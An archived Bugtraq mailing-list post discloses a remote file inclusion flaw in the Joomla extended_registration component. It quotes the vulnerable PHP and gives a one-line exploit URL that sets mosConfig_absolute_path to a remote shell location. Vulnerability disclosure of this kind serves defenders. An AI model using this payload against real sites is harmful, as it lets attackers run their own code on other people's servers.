Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Joomla extended_registration mod Remote File Include Vulnerabilities

From: crackers_child () sibersavascilar com
Date: 26 Oct 2006 15:45:27 -0000
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : Joomla extended_registration mod  Remote File Include Vulnerabilities

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: crackers_child () sibersavascilar com

--------------------------------------------------------------------------------
Bug in admin.extended_registration.php

<?php

require("../configuration.php");

function extended_registration_settings($state,$lang) {
    global $mosConfig_absolute_path;


--------------------------------------------------------------------------------

Exploit:



www.site.com/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=Shel3l?


--------------------------------------------------------------------------------

greets:

X_ALPEREN_X and All SiberSavascilar.CoM Members !

--------------------------------------------------------------------------------


--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: